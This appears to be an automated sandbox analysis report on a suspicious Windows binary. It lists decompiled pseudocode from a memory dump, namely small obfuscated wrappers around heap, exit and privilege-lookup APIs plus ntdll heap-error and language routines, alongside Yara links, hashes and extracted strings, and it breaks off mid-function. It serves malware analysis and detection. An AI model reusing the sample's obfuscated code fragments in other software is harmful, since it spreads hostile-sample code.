Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8721e385d96061455ae89db71bc0e6eb1920694497cfc1b891abd7b6b185535a
Instruction ID: cb22c1a57b80f49d56a75b86ad745b5ca22e222deb2082fbf39c79dff7e44d3a
Opcode Fuzzy Hash: 8721e385d96061455ae89db71bc0e6eb1920694497cfc1b891abd7b6b185535a
Instruction Fuzzy Hash: DCE0D8751042502BD710DF15EC80ED77B99DF82294F24855DFC8E1B202C935A855CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004184C2(void* __ebx, void* __ecx, void* __eflags, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
				char _v0;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t15;
				void* _t22;

				if(__eflags <= 0) {
					E00418DC0(_t22, _t12, _t12 + 0xc70,  *((intOrPtr*)(_t12 + 0x10)), 0, 0x34);
					_t15 = RtlAllocateHeap(_a12, _a16, _a20); // executed
					return _t15;
				} else {
					asm("stosb");
					__eflags = __ebx;
					asm("fisttp dword [esi+0x6284dc5f]");
					__ebp = __esp;
					__eax = _v0;
					_t8 = __eax + 0xc74; // 0xc74
					__esi = _t8;
					E00418DC0(__edi, _v0, _t8,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35) = _a8;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x004184c3
0x004184a7
0x004184bd
0x004184c1
0x004184c5
0x004184c5
0x004184c6
0x004184c8
0x004184d1
0x004184d3
0x004184df
0x004184df
0x004184ef
0x004184fd
0x004184ff
0x00418500
0x00418501
0x00418501

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bf92b9945704af05f7c101eec3dfa8da5aa8ada0c501222809760ed578030129
Instruction ID: 7b569699a20d9bc59383f72aca95d3c30553b9a4048a9f42735f9528c1d23d1e
Opcode Fuzzy Hash: bf92b9945704af05f7c101eec3dfa8da5aa8ada0c501222809760ed578030129
Instruction Fuzzy Hash: 0CE09AB2200200ABE724DF54DC41FE77769AF88310F11854DFB182B382CA31E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418502, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00418502(intOrPtr _a4) {
				void* _t7;
				void* _t8;
				void* _t11;
				signed int _t12;
				void* _t15;
				void* _t16;

				_t8 = _t7 + 0x94f9758b;
				if(_t8 < 0) {
					L3:
					 *_t12 =  *_t12 | _t12;
					 *((intOrPtr*)(_t11 + 0x68b0c55)) =  *((intOrPtr*)(_t11 + 0x68b0c55)) + _t8;
					ExitProcess(0x8b5534be);
				}
				asm("xlatb");
				 *0x8b5534be = _t16;
				asm("outsd");
				_t12 =  *(_a4 + 0xa14);
				_push(_t16);
				_t8 = E00418DC0(_t15, _a4, _a4 + 0xc7c, _t12, 0, 0x36);
				goto L3;
			}

0x00418502
0x00418507
0x0041852b
0x0041852c
0x0041852e
0x00418538
0x00418538
0x00418509
0x0041850a
0x0041850c
0x00418516
0x0041851c
0x0041852a
0x00000000

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c9dc397d02288eb73500518751a55d7446c49fb3f9c0b025760b8cb80e291de7
Instruction ID: 49f720f95aad18a7db93c8388c8edfabf8fbae8d7310b575d4c48fbe5ed38bdf
Opcode Fuzzy Hash: c9dc397d02288eb73500518751a55d7446c49fb3f9c0b025760b8cb80e291de7
Instruction Fuzzy Hash: 63E09271645310ABD716DF28CCA5EC77BA5DF56350F14809AF8499B283CA35AA01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t7 = _a4;
				E00418DC0(_t15, _t7, _t7 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418493
0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(void* __ebx, void* __ecx, void* __edx, void* __esi, void* _a1, void* _a4, void* _a12, void* _a16, void* _a20) {
				void* _t14;

				_t14 = __ecx;
			}

0x00418630

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4) {
				void* _t8;
				void* _t10;
				signed int _t11;
				int _t13;
				void* _t14;

				_t11 =  *(_a4 + 0xa14);
				_t8 = E00418DC0(_t14, _a4, _a4 + 0xc7c, _t11, 0, 0x36);
				 *_t11 =  *_t11 | _t11;
				 *((intOrPtr*)(_t10 + 0x68b0c55)) =  *((intOrPtr*)(_t10 + 0x68b0c55)) + _t8;
				ExitProcess(_t13);
			}

0x00418516
0x0041852a
0x0041852c
0x0041852e
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0540967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05409694

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa70384e07184ef837ac871f45a21eaefb49c90064bfa60af139ec9c6ca1cf01
Instruction ID: aada1d8123b05378d2fb4595fd216280572580d3b907140c427ae7521814fe18
Opcode Fuzzy Hash: fa70384e07184ef837ac871f45a21eaefb49c90064bfa60af139ec9c6ca1cf01
Instruction Fuzzy Hash: ECB09BB1D014D5C5D611D7604608B677D1177D0741F66C563D5020755B4778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0547B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** enter .exr %p for the exception record, xrefs: 0547B4F1
<unknown>, xrefs: 0547B27E, 0547B2D1, 0547B350, 0547B399, 0547B417, 0547B48E
The instruction at %p referenced memory at %p., xrefs: 0547B432
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0547B53F
The resource is owned shared by %d threads, xrefs: 0547B37E
*** then kb to get the faulting stack, xrefs: 0547B51C
write to, xrefs: 0547B4A6
*** enter .cxr %p for the context, xrefs: 0547B50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0547B314
The instruction at %p tried to %s , xrefs: 0547B4B6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0547B39B
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0547B2F3
The critical section is owned by thread %p., xrefs: 0547B3B9
The resource is owned exclusively by thread %p, xrefs: 0547B374
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0547B323
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0547B38F
read from, xrefs: 0547B4AD, 0547B4B2
a NULL pointer, xrefs: 0547B4E0
Go determine why that thread has not released the critical section., xrefs: 0547B3C5
*** Resource timeout (%p) in %ws:%s, xrefs: 0547B352
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0547B47D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0547B3D6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0547B305
*** An Access Violation occurred in %ws:%s, xrefs: 0547B48F
*** Inpage error in %ws:%s, xrefs: 0547B418
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0547B484
This failed because of error %Ix., xrefs: 0547B446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0547B2DC
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0547B476
an invalid address, %p, xrefs: 0547B4CF

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 04ae3d6c42ec3edfeae9d7b2484f0d627b2ec938d17ad6f933ae608635219f06
Instruction ID: d426083694592cf98e8c4e4b2e177345167a94051a5a3e589534f2979c2b29f7
Opcode Fuzzy Hash: 04ae3d6c42ec3edfeae9d7b2484f0d627b2ec938d17ad6f933ae608635219f06
Instruction Fuzzy Hash: 1D810675A04204FFEB259A26DC89EFF3F36EF46665F40408AFA051B212E3B19442E771

Uniqueness

Uniqueness Score: -1.00%

Function 05481C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05481C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x53a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E053CB150();
				} else {
					E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x54b589c);
				E053CB150("Heap error detected at %p (heap handle %p)\n",  *0x54b58a0);
				_t27 =  *0x54b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05481E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E053CB150();
				} else {
					E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E053CB150("Error code: %d - %s\n",  *0x54b5898);
				_t113 =  *0x54b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E053CB150();
					} else {
						E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E053CB150("Parameter1: %p\n",  *0x54b58a4);
				}
				_t115 =  *0x54b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E053CB150();
					} else {
						E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E053CB150("Parameter2: %p\n",  *0x54b58a8);
				}
				_t117 =  *0x54b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E053CB150();
					} else {
						E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E053CB150("Parameter3: %p\n",  *0x54b58ac);
				}
				_t119 =  *0x54b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E053CB150();
					} else {
						E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x54b58b4);
					E053CB150("Last known valid blocks: before - %p, after - %p\n",  *0x54b58b0);
				} else {
					_t120 =  *0x54b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E053CB150();
				} else {
					E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E053CB150("Stack trace available at %p\n", 0x54b58c0);
			}

0x05481c10
0x05481c16
0x05481c1e
0x05481c3d
0x05481c3e
0x05481c20
0x05481c35
0x05481c3a
0x05481c44
0x05481c55
0x05481c5a
0x05481c65
0x05481c67
0x00000000
0x05481c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05481c67
0x05481cdc
0x05481ce5
0x05481d04
0x05481d05
0x05481ce7
0x05481cfc
0x05481d01
0x05481d0b
0x05481d17
0x05481d1f
0x05481d25
0x05481d30
0x05481d4f
0x05481d50
0x05481d32
0x05481d47
0x05481d4c
0x05481d61
0x05481d67
0x05481d68
0x05481d6e
0x05481d79
0x05481d98
0x05481d99
0x05481d7b
0x05481d90
0x05481d95
0x05481daa
0x05481db0
0x05481db1
0x05481db7
0x05481dc2
0x05481de1
0x05481de2
0x05481dc4
0x05481dd9
0x05481dde
0x05481df3
0x05481df9
0x05481dfa
0x05481e00
0x05481e0a
0x05481e13
0x05481e32
0x05481e33
0x05481e15
0x05481e2a
0x05481e2f
0x05481e39
0x05481e4a
0x05481e02
0x05481e02
0x05481e08
0x00000000
0x00000000
0x05481e08
0x05481e5b
0x05481e7a
0x05481e7b
0x05481e5d
0x05481e72
0x05481e77
0x05481e95

Strings

heap_failure_usage_after_free, xrefs: 05481CBB
heap_failure_virtual_block_corruption, xrefs: 05481C91
heap_failure_cross_heap_operation, xrefs: 05481CC2
heap_failure_generic, xrefs: 05481C7C
HEAP: , xrefs: 05481C16, 05481C3D, 05481D04, 05481D4F, 05481D98, 05481DE1, 05481E32, 05481E7A
heap_failure_buffer_overrun, xrefs: 05481C98
heap_failure_unknown, xrefs: 05481C75
Error code: %d - %s, xrefs: 05481D12
Last known valid blocks: before - %p, after - %p, xrefs: 05481E45
Parameter1: %p, xrefs: 05481D5C
heap_failure_freelists_corruption, xrefs: 05481CC9
heap_failure_entry_corruption, xrefs: 05481C83
Stack trace available at %p, xrefs: 05481E86
heap_failure_multiple_entries_corruption, xrefs: 05481C8A
HEAP[%wZ]: , xrefs: 05481C30, 05481CF7, 05481D42, 05481D8B, 05481DD4, 05481E25, 05481E6D
heap_failure_internal, xrefs: 05481C6E
heap_failure_invalid_argument, xrefs: 05481CAD
heap_failure_block_not_busy, xrefs: 05481CA6
heap_failure_listentry_corruption, xrefs: 05481CD0
heap_failure_invalid_allocation_type, xrefs: 05481CB4
Parameter2: %p, xrefs: 05481DA5
Heap error detected at %p (heap handle %p), xrefs: 05481C50
heap_failure_lfh_bitmap_mismatch, xrefs: 05481CD7
Parameter3: %p, xrefs: 05481DEE
heap_failure_buffer_underrun, xrefs: 05481C9F

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 1ca69ec1eb3b039fd1bab12b47dcffb8399ffa8f2aa02fae2a13f6f1d55086fc
Instruction ID: 86daf69f34a64b10c058371be00dba9e97e5e515ab4d278f27445d6fc78b36f8
Opcode Fuzzy Hash: 1ca69ec1eb3b039fd1bab12b47dcffb8399ffa8f2aa02fae2a13f6f1d55086fc
Instruction Fuzzy Hash: EE61C636A14144DFE211B748D49AEF9B7FDEB04A20B4990AFF50E5B700D674AC53EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 053D3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E053D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E053D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E053D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E053D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E053D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L053E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0540F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05411370(_t276, 0x53a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0540BB40(0,  &_v68, _t170);
									if(L053D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0540BB40(_t257,  &_v68, _t243);
								if(L053D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05411370(_t278, 0x53a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L053E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0540F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05411370(_v16, 0x53a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0540BB40(_t262,  &_v68, _t244);
								if(L053D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05411370(_t282, 0x53a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0540BB40(_t262,  &_v68, _t201);
							if(L053D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L053E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0540F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05411370(_t280, 0x53a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0540BB40(_t267,  &_v68, _t245);
							if(L053D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05411370(_t284, 0x53a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0540BB40(_t267,  &_v68, _t224);
						if(L053D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
